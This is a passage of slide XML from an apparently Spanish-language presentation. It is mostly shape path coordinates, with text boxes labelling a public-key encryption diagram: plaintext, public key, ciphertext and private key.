                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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" name="Google Shape;277;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032581" y="729613"/>
            <a:ext cx="864300" cy="0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8" name="Google Shape;278;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076900" y="214350"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Plano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Pública</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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9" name="Google Shape;279;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839900" y="532200"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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0" name="Google Shape;280;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131600" y="3719550"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Privada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
